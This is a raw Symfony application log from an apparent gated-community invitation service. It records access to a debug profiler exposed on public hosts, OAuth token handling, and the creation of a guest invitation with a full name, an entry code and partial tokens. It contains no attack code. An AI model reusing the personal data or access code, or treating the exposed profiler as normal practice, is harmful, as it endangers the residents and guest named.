[2025-12-18 19:16:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 19:17:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 19:17:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=request","method":"GET"} []
[2025-12-18 19:17:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 19:28:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=config","method":"GET"} []
[2025-12-18 19:28:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 19:28:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"309a78","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/309a78?panel=events","method":"GET"} []
[2025-12-18 19:28:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-18 19:30:06] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b1be4f","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/b1be4f/search/results?ip=189.172.56.183&limit=10","method":"GET"} []
[2025-12-18 19:30:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10","method":"GET"} []
[2025-12-18 19:30:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4a9f2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4a9f2a?panel=cache","method":"GET"} []
[2025-12-18 19:30:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 19:33:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /users/sign_in"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /users/sign_in\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 19:36:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e183e3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e183e3","method":"GET"} []
[2025-12-18 19:36:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 19:37:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=twig","method":"GET"} []
[2025-12-18 19:37:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 19:37:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-18 19:38:08] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"f45022","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/f45022","method":"GET"} []
[2025-12-18 19:45:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=time","method":"GET"} []
[2025-12-18 19:45:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 19:54:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=security","method":"GET"} []
[2025-12-18 19:54:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 19:55:57] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=address%2Cnotification_setting%2Cresidential","method":"GET"} []
[2025-12-18 19:55:57] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 19:55:57] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:57] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:57] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:57] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["ea268be9b03224f64d066e1f1e [...]"] []
[2025-12-18 19:55:57] security.INFO: Guard authentication failed. {"exception":"[object] (Hona\\AdminBundle\\Exception\\NotValidTokenFoundException(code: 0): Expired Token at /var/repositories/hona/src/Hona/AdminBundle/Security/AdminUserProvider.php:79)","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:57] security.DEBUG: The "Hona\ApiBundle\Security\ApiAuthenticator" authenticator set the response. Any later authenticator will not be called {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:58] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-18 19:55:58] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["2ddd8825467a868ac0ba2a908d [...]"] []
[2025-12-18 19:55:58] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 19:55:58] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"d3e6ab7ec29c90a60851e5ab0e [...]","3":"2025-12-18 20:25:58","4":"","5":458,"6":"[]"} []
[2025-12-18 19:55:58] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 19:55:58] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 19:55:58] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"daa5fab2d477a45d531b0f54eb [...]","3":"2026-02-16 19:55:58","4":"","5":458,"6":"[]"} []
[2025-12-18 19:55:58] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 19:55:58] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 19:55:58] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"2ddd8825467a868ac0ba2a908d [...]"] []
[2025-12-18 19:55:58] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 19:55:58] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=address%2Cnotification_setting%2Cresidential","method":"GET"} []
[2025-12-18 19:55:58] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 19:55:58] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:58] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:58] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d3e6ab7ec29c90a60851e5ab0e [...]"] []
[2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
[2025-12-18 19:55:58] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:58] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:58] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["a1459bf9-4d7b-4d4c-ae6f-8a [...]"] []
[2025-12-18 19:55:58] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [458,1] []
[2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-18 19:55:58] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [458,1] []
[2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
[2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [458,259] []
[2025-12-18 19:55:58] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 19:55:59] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"ac5559db-94bf-49bb-b4bf-9d75cd7022a2","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/ac5559db-94bf-49bb-b4bf-9d75cd7022a2/invitation/20/0?order=desc","method":"GET"} []
[2025-12-18 19:55:59] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 19:55:59] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:59] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:59] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d3e6ab7ec29c90a60851e5ab0e [...]"] []
[2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
[2025-12-18 19:55:59] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:59] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:59] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
[2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [458,259,1] []
[2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
[2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-18 19:55:59] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [259,1] []
[2025-12-18 19:55:59] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [259,1] []
[2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
[2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [459] []
[2025-12-18 19:55:59] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 19:56:25] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-18 19:56:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 19:56:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:56:25] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:56:25] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d3e6ab7ec29c90a60851e5ab0e [...]"] []
[2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
[2025-12-18 19:56:25] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:56:25] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:56:25] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
[2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [458,259,1] []
[2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["a1459bf9-4d7b-4d4c-ae6f-8a [...]"] []
[2025-12-18 19:56:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
[2025-12-18 19:56:25] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [458,259,1] []
[2025-12-18 19:56:26] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 19:56:26] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"6c7b8f88-aef5-440b-a8c3-a8 [...]","2":1,"3":"2025-12-18 19:56:26","4":"2025-12-18 19:56:26","5":"Evelin Del Carmen","6":"Lara Amendola","7":"167801","8":"/invitation/336c8e12c04120 [...]","9":1,"10":null,"11":"2025-12-18 21:00:00","12":null,"13":null,"14":null,"15":259,"16":458} []
[2025-12-18 19:56:26] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 19:56:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
[2025-12-18 19:56:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [259] []
[2025-12-18 19:56:26] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 19:58:46] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 19:58:46] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
